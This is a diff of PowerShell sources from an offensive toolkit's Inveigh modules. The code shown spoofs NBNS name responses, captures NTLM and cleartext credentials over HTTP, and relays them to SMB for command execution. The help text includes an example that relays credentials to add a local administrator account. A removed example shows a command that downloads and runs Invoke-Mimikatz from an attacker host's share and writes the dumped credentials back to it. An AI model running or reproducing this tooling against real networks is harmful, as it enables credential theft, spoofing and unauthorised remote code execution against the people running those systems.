-                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a)`
-                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20)`
-                + $HTTP_content_length_bytes`
-                + (0x0d,0x0a)`
-                + $HTTP_message_bytes 
+            $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
+                             $HTTP_response_status_code +
+                             0x20 +
+                             $HTTP_response_phrase +
+                             0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
+                             0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
+                             0x0a,0x44,0x61,0x74,0x65,0x3a +
+                             $HTTP_timestamp +
+                             0x0d,0x0a +
+                             $HTTP_WWW_authenticate_header +
+                             $NTLM +
+                             0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,
+                             0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,
+                             0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
+                             0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 +
+                             $HTTP_content_length_bytes +
+                             0x0d,0x0a +
+                             $HTTP_message_bytes
+
         }
         elseif(($HTTPAuth -eq 'Basic' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $HTTP_request_raw_URL -match '/wpad.dat'))
         {
             $Basic = [System.Text.Encoding]::UTF8.GetBytes("Basic realm=$HTTPBasicRealm")
-            $HTTP_message_bytes = (0x0d,0x0a)
+            $HTTP_message_bytes = 0x0d,0x0a
             $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
             $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
             $HTTP_client_close = $true
 
-            [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`
-                + $HTTP_response_status_code`
-                + (0x20)`
-                + $HTTP_response_phrase`
-                + (0x0d,0x0a)`
-                + (0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a)`
-                + (0x44,0x61,0x74,0x65,0x3a)`
-                + $HTTP_timestamp`
-                + (0x0d,0x0a)`
-                + $HTTP_WWW_authenticate_header`
-                + $Basic`
-                + (0x0d,0x0a)`
-                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a)`
-                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20)`
-                + $HTTP_content_length_bytes`
-                + (0x0d,0x0a)`
-                + $HTTP_message_bytes 
+            $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
+                             $HTTP_response_status_code +
+                             0x20 +
+                             $HTTP_response_phrase +
+                             0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
+                             0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
+                             0x0a,0x44,0x61,0x74,0x65,0x3a +
+                             $HTTP_timestamp +
+                             0x0d,0x0a +
+                             $HTTP_WWW_authenticate_header +
+                             $Basic +
+                             0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,
+                             0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,
+                             0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
+                             0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 +
+                             $HTTP_content_length_bytes +
+                             0x0d,0x0a +
+                             $HTTP_message_bytes
+
         }
         else
         {
-            $HTTP_response_status_code = (0x32,0x30,0x30)
-            $HTTP_response_phrase = (0x4f,0x4b)
-            $HTTP_message_bytes = (0x0d,0x0a)
+            $HTTP_response_status_code = 0x32,0x30,0x30
+            $HTTP_response_phrase = 0x4f,0x4b
+            $HTTP_message_bytes = 0x0d,0x0a
             $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
             $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
             $HTTP_client_close = $true
 
-            [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`
-                + $HTTP_response_status_code`
-                + (0x20)`
-                + $HTTP_response_phrase`
-                + (0x0d,0x0a)`
-                + (0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a)`
-                + (0x44,0x61,0x74,0x65,0x3a)`
-                + $HTTP_timestamp`
-                + (0x0d,0x0a)`
-                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a)`
-                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20)`
-                + $HTTP_content_length_bytes`
-                + (0x0d,0x0a)`
-                + $HTTP_message_bytes 
+            $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
+                             $HTTP_response_status_code +
+                             0x20 +
+                             $HTTP_response_phrase +
+                             0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
+                             0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
+                             0x0a,0x44,0x61,0x74,0x65,0x3a +
+                             $HTTP_timestamp +
+                             0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,
+                             0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,
+                             0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
+                             0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 +
+                             $HTTP_content_length_bytes +
+                             0x0d,0x0a +
+                             $HTTP_message_bytes 
         }
 
-        $HTTP_stream.write($HTTP_response, 0, $HTTP_response.length)
+        $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
         $HTTP_stream.Flush()
-        start-sleep -m 10
+        Start-Sleep -m 10
         $HTTP_request_raw_URL_old = $HTTP_request_raw_URL
-        $HTTP_client_handle_old= $inveigh.HTTP_client.Client.Handle
+        $HTTP_client_handle_old = $inveigh.HTTP_client.Client.Handle
 
         if($HTTP_client_close)
         {
@@ -827,14 +887,16 @@ $HTTP_scriptblock =
             if($RunCount -gt 0 -and ($inveigh.NTLMv1_list.Count -ge $run_count_NTLMv1 -or $inveigh.NTLMv2_list.Count -ge $run_count_NTLMv2 -or $inveigh.cleartext_list.Count -ge $run_count_cleartext))
             {
                 HTTPListenerStop
-                $inveigh.console_queue.add("Inveigh Brute Force exited due to run count at $(Get-Date -format 's')")
-                $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Inveigh Brute Force exited due to run count")])
+                $inveigh.console_queue.Add("Inveigh Brute Force exited due to run count at $(Get-Date -format 's')")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force exited due to run count")])
                 $inveigh.bruteforce_running = $false
             }
+
         }
 
         $HTTP_client_close = $false
     }
+
 }
 
 $spoofer_scriptblock = 
@@ -843,17 +905,19 @@ $spoofer_scriptblock =
    
     $Hostname = $Hostname.ToUpper()
 
-    [Byte[]]$hostname_bytes = (0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00)
+    $hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
+                      0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00
 
     $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
     $hostname_encoded = [System.BitConverter]::ToString($hostname_encoded)
     $hostname_encoded = $hostname_encoded.Replace("-","")
     $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded)
-    $NBNS_TTL_bytes = [BitConverter]::GetBytes($NBNSTTL)
-    [array]::Reverse($NBNS_TTL_bytes)
+    $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
+    [Array]::Reverse($NBNS_TTL_bytes)
 
-    for ($i=0; $i -lt $hostname_encoded.Count; $i++)
+    for($i=0; $i -lt $hostname_encoded.Count; $i++)
     {
+
         if($hostname_encoded[$i] -gt 64)
         {
             $hostname_bytes[$i] = $hostname_encoded[$i] + 10
@@ -862,54 +926,59 @@ $spoofer_scriptblock =
         {
             $hostname_bytes[$i] = $hostname_encoded[$i] + 17
         }
+    
     }
 
-    [Byte[]]$NBNS_response_packet = (0x00,0x00)`
-        + (0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20)`
-        + $hostname_bytes`
-        + (0x00,0x20,0x00,0x01)`
-        + $NBNS_TTL_bytes`
-        + (0x00,0x06,0x00,0x00)`
-        + ([IPAddress][String]([IPAddress]$SpooferIP)).GetAddressBytes()`
-        + (0x00,0x00,0x00,0x00)
+    $NBNS_response_packet = 0x00,0x00,0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
+                            $hostname_bytes +
+                            0x00,0x20,0x00,0x01 +
+                            $NBNS_TTL_bytes +
+                            0x00,0x06,0x00,0x00 +
+                            ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
+                            0x00,0x00,0x00,0x00
 
-    $inveigh.console_queue.add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $Hostname on $SpooferTarget")
-    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $Hostname on $SpooferTarget")])
-    $NBNS_paused = $false
-              
+    $inveigh.console_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $Hostname on $SpooferTarget")
+    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $Hostname on $SpooferTarget")])
+    $NBNS_paused = $false          
     $send_socket = New-Object System.Net.Sockets.UdpClient(137)
-    $destination_IP = [system.net.IPAddress]::Parse($SpooferTarget)
+    $destination_IP = [System.Net.IPAddress]::Parse($SpooferTarget)
     $destination_point = New-Object Net.IPEndpoint($destination_IP,137)
     $send_socket.Connect($destination_point)
        
     while($inveigh.bruteforce_running)
     {
+
         :NBNS_spoofer_loop while (!$inveigh.hostname_spoof -and $inveigh.bruteforce_running)
         {
+
             if($NBNS_paused)
             {
-                $inveigh.console_queue.add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
-                $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")])
+                $inveigh.console_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")])
                 $NBNS_paused = $false
             }
 
             for ($i = 0; $i -lt 255; $i++)
             {
+
                 for ($j = 0; $j -lt 255; $j++)
                 {
                     $NBNS_response_packet[0] = $i
                     $NBNS_response_packet[1] = $j                 
-                    [void]$send_socket.send( $NBNS_response_packet,$NBNS_response_packet.length)
+                    $send_socket.send( $NBNS_response_packet,$NBNS_response_packet.Length)
 
                     if($inveigh.hostname_spoof -and $NBNSPause)
                     {
-                        $inveigh.console_queue.add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")])
+                        $inveigh.console_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")])
                         $NBNS_paused = $true
                         break NBNS_spoofer_loop
                     }
+                
                 }
+            
             }
+        
         }
 
         Start-Sleep -m 5
@@ -925,7 +994,7 @@ $control_bruteforce_scriptblock =
     if($RunTime)
     {    
         $control_timeout = new-timespan -Minutes $RunTime
-        $control_stopwatch = [diagnostics.stopwatch]::StartNew()
+        $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
     }
 
     if($NBNSPause)
@@ -937,9 +1006,11 @@ $control_bruteforce_scriptblock =
     {
 
         if($RunTime)
-        {    
-            if($control_stopwatch.elapsed -ge $control_timeout)
+        {
+            
+            if($control_stopwatch.Elapsed -ge $control_timeout)
             {
+
                 if($inveigh.HTTP_listener.IsListening)
                 {
                     $inveigh.HTTP_listener.Stop()
@@ -949,40 +1020,44 @@ $control_bruteforce_scriptblock =
                 if($inveigh.bruteforce_running)
                 {
                     HTTPListenerStop
-                    $inveigh.console_queue.add("Inveigh Brute Force exited due to run time at $(Get-Date -format 's')")
-                    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Inveigh Brute Force exited due to run time")])
+                    $inveigh.console_queue.Add("Inveigh Brute Force exited due to run time at $(Get-Date -format 's')")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force exited due to run time")])
                     Start-Sleep -m 5
                     $inveigh.bruteforce_running = $false
                 }
             
                 if($inveigh.relay_running)
                 {
-                    $inveigh.console_queue.add("Inveigh Relay exited due to run time at $(Get-Date -format 's')")
-                    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")])
+                    $inveigh.console_queue.Add("Inveigh Relay exited due to run time at $(Get-Date -format 's')")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")])
                     Start-Sleep -m 5
                     $inveigh.relay_running = $false
                 } 
 
                 if($inveigh.running)
                 {
-                    $inveigh.console_queue.add("Inveigh exited due to run time at $(Get-Date -format 's')")
-                    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Inveigh exited due to run time")])
+                    $inveigh.console_queue.Add("Inveigh exited due to run time at $(Get-Date -format 's')")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to run time")])
                     Start-Sleep -m 5
                     $inveigh.running = $false
                 } 
+            
             }
         }
 
         if($NBNSPause -and $inveigh.hostname_spoof)
-        {    
-            if($inveigh.NBNS_stopwatch.elapsed -ge $NBNS_pause)
+        {
+         
+            if($inveigh.NBNS_stopwatch.Elapsed -ge $NBNS_pause)
             {
                 $inveigh.hostname_spoof = $false
             }
+        
         }
 
         if($inveigh.file_output -and !$inveigh.running)
         {
+
             while($inveigh.log_file_queue.Count -gt 0)
             {
                 $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
@@ -1006,6 +1081,7 @@ $control_bruteforce_scriptblock =
                 $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
                 $inveigh.cleartext_file_queue.RemoveRange(0,1)
             }
+        
         }
 
         Start-Sleep -m 5
@@ -1013,42 +1089,43 @@ $control_bruteforce_scriptblock =
  }
 
 # End ScriptBlocks
-# Begin Startup Functions
+# Begin Startup functions
 
-# HTTP Listener Startup Function 
-Function HTTPListener()
+# HTTP Listener Startup function 
+function HTTPListener()
 {
+
     if($HTTPIP)
     {
-        $HTTPIP = [system.net.IPAddress]::Parse($HTTPIP)
+        $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP)
         $inveigh.HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort)
     }
     else
     {
-        $inveigh.HTTP_endpoint = New-Object System.Net.IPEndPoint([ipaddress]::any,$HTTPPort)
+        $inveigh.HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort)
     }
 
     $inveigh.HTTP_listener = New-Object System.Net.Sockets.TcpListener $inveigh.HTTP_endpoint
     $inveigh.HTTP_listener.Start()
-    $HTTP_runspace = [runspacefactory]::CreateRunspace()
+    $HTTP_runspace = [RunspaceFactory]::CreateRunspace()
     $HTTP_runspace.Open()
     $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
-    $HTTP_powershell = [powershell]::Create()
+    $HTTP_powershell = [PowerShell]::Create()
     $HTTP_powershell.Runspace = $HTTP_runspace
     $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
     $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($HTTPAuth).AddArgument($HTTPBasicRealm).AddArgument($HTTPResponse).AddArgument(
-        $MachineAccounts).AddArgument($NBNSPause).AddArgument($WPADAuth).AddArgument($WPADIP).AddArgument($WPADPort).AddArgument(
+        $NBNSPause).AddArgument($WPADAuth).AddArgument($WPADIP).AddArgument($WPADPort).AddArgument(
         $WPADDirectHosts).AddArgument($WPADResponse).AddArgument($RunCount) > $null
     $HTTP_powershell.BeginInvoke() > $null
 }
 
-# Spoofer Startup Function
-Function Spoofer()
+# Spoofer Startup function
+function Spoofer()
 {
-    $spoofer_runspace = [runspacefactory]::CreateRunspace()
+    $spoofer_runspace = [RunspaceFactory]::CreateRunspace()
     $spoofer_runspace.Open()
     $spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
-    $spoofer_powershell = [powershell]::Create()
+    $spoofer_powershell = [PowerShell]::Create()
     $spoofer_powershell.Runspace = $spoofer_runspace
     $spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
     $spoofer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
@@ -1057,31 +1134,31 @@ Function Spoofer()
     $spoofer_powershell.BeginInvoke() > $null
 }
 
-# Control Brute Force Startup Function
-Function ControlBruteForceLoop()
+# Control Brute Force Startup function
+function ControlBruteForceLoop()
 {
-    $control_bruteforce_runspace = [runspacefactory]::CreateRunspace()
+    $control_bruteforce_runspace = [RunspaceFactory]::CreateRunspace()
     $control_bruteforce_runspace.Open()
     $control_bruteforce_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
-    $control_bruteforce_powershell = [powershell]::Create()
+    $control_bruteforce_powershell = [PowerShell]::Create()
     $control_bruteforce_powershell.Runspace = $control_bruteforce_runspace
     $control_bruteforce_powershell.AddScript($shared_basic_functions_scriptblock) > $null
     $control_bruteforce_powershell.AddScript($control_bruteforce_scriptblock).AddArgument($NBNSPause).AddArgument($RunTime) > $null
     $control_bruteforce_powershell.BeginInvoke() > $null
 }
 
-# End Startup Functions
+# End Startup functions
 
 # Startup Enabled Services
 
 # HTTP Server Start
-if($HTTP -eq 'y')
+if($HTTP -eq 'Y')
 {
     HTTPListener
 }
 
 # Spoofer Start
-if($NBNS -eq 'y')
+if($NBNS -eq 'Y')
 {
     Spoofer
 }
@@ -1094,72 +1171,90 @@ if($NBNSPause -or $RunTime -or $inveigh.file_output)
 
 if($inveigh.console_output)
 {
+
     :console_loop while(($inveigh.bruteforce_running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
     {
+
         while($inveigh.console_queue.Count -gt 0)
         {
+
             if($inveigh.output_stream_only)
             {
-                write-output($inveigh.console_queue[0] + $inveigh.newline)
+                Write-Output($inveigh.console_queue[0] + $inveigh.newline)
                 $inveigh.console_queue.RemoveRange(0,1)
             }
             else
             {
+
                 switch -wildcard ($inveigh.console_queue[0])
                 {
+
                     "Inveigh *exited *"
                     {
-                        write-warning $inveigh.console_queue[0]
+                        Write-Warning $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     "* written to *"
                     {
+
                         if($inveigh.file_output)
                         {
-                            write-warning $inveigh.console_queue[0]
+                            Write-Warning $inveigh.console_queue[0]
                         }
 
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     "* for relay *"
                     {
-                        write-warning $inveigh.console_queue[0]
+                        Write-Warning $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     "*SMB relay *"
                     {
-                        write-warning $inveigh.console_queue[0]
+                        Write-Warning $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     "* local administrator *"
                     {
-                        write-warning $inveigh.console_queue[0]
+                        Write-Warning $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     default
                     {
-                        write-output $inveigh.console_queue[0]
+                        Write-Output $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
-                } 
-            }   
+
+                }
+
+            }
+
         }
 
         if($inveigh.console_input)
         {
-            if([console]::KeyAvailable)
+
+            if([Console]::KeyAvailable)
             {
                 $inveigh.console_output = $false
                 BREAK console_loop
             }
+        
         }
 
         Start-Sleep -m 5
     }
+
 }
 
 if($inveigh.file_output -and !$inveigh.running)
 {
+
     while($inveigh.log_file_queue.Count -gt 0)
     {
         $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
@@ -1183,6 +1278,7 @@ if($inveigh.file_output -and !$inveigh.running)
         $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
         $inveigh.cleartext_file_queue.RemoveRange(0,1)
     }
+
 }
 
 }

--- a/data/module_source/lateral_movement/Invoke-InveighRelay.ps1
+++ b/data/module_source/lateral_movement/Invoke-InveighRelay.ps1
@@ -1,4 +1,4 @@
-Function Invoke-InveighRelay
+function Invoke-InveighRelay
 {
 <#
 .SYNOPSIS
@@ -16,24 +16,29 @@ Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB relay with psexec styl
 Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
 
 .PARAMETER HTTPS
-Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443.
-If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
+Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
+the local store and attached to port 443. If the script does not exit gracefully, execute
+"netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal"
+in the cert store.
 
 .PARAMETER HTTPSCertAppID
 Specify a valid application GUID for use with the ceriticate.
 
 .PARAMETER HTTPSCertThumbprint
-Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx.
+Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in
+the current working directory and named Inveigh.pfx.
 
 .PARAMETER Challenge
-Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.
-Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. 
+Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a
+random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be
+pulled from the SMB relay target. 
 
 .PARAMETER MachineAccounts
 Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
 
 .PARAMETER WPADAuth
-Default = NTLM: (Anonymous,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
+Default = NTLM: (Anonymous,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting
+to Anonymous can prevent browser login prompts.
 
 .PARAMETER SMBRelayTarget
 IP address of system to target for SMB relay.
@@ -42,16 +47,19 @@ IP address of system to target for SMB relay.
 Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
 
 .PARAMETER SMBRelayUsernames
-Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. 
+Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and
+domain\username format. 
 
 .PARAMETER SMBRelayAutoDisable
 Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target.
 
 .PARAMETER SMBRelayNetworkTimeout
-Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
+Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay
+target after each packet is sent.
 
 .PARAMETER ConsoleOutput
-Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
+Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
+ensure that it doesn't hang the shell.
 
 .PARAMETER FileOutput
 Default = Disabled: (Y/N) Enable/Disable real time file output.
@@ -60,60 +68,57 @@ Default = Disabled: (Y/N) Enable/Disable real time file output.
 Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
 
 .PARAMETER OutputStreamOnly
-Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Relay through a shell that does not return other output streams.
-Note that you will not see the various yellow warning messages if enabled.
+Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if
+running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the
+various yellow warning messages if enabled.
 
 .PARAMETER OutputDir
-Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled.
-
-.PARAMETER ShowHelp
-Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
+Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must
+also be enabled.
 
 .PARAMETER RunTime
 (Integer) Set the run time duration in minutes.
 
+.PARAMETER ShowHelp
+Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
+
 .PARAMETER Tool
-Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire  
+Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's
+Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire  
 
 .EXAMPLE
 Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add"
-Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay target.  
-
-.EXAMPLE
-Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "powershell \\192.168.2.50\temp$\powermeup.cmd"
-Execute with SMB relay enabled and using Mubix's powermeup.cmd method of launching Invoke-Mimikatz.ps1 and uploading output. In this example, a hidden anonymous share containing Invoke-Mimikatz.ps1 is employed on the Inveigh host system. 
-Powermeup.cmd contents used for this example:
-powershell "IEX (New-Object Net.WebClient).DownloadString('\\192.168.2.50\temp$\Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.2.50\temp$\%COMPUTERNAME%.txt 2>&1"
-Original version:
-https://github.com/mubix/post-exploitation/blob/master/scripts/mass_mimikatz/powermeup.cmd
+Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay
+target.
 
 .LINK
 https://github.com/Kevin-Robertson/Inveigh
 #>
 
 # Parameter default values can be modified in this section:
+[CmdletBinding()]
 param
 ( 
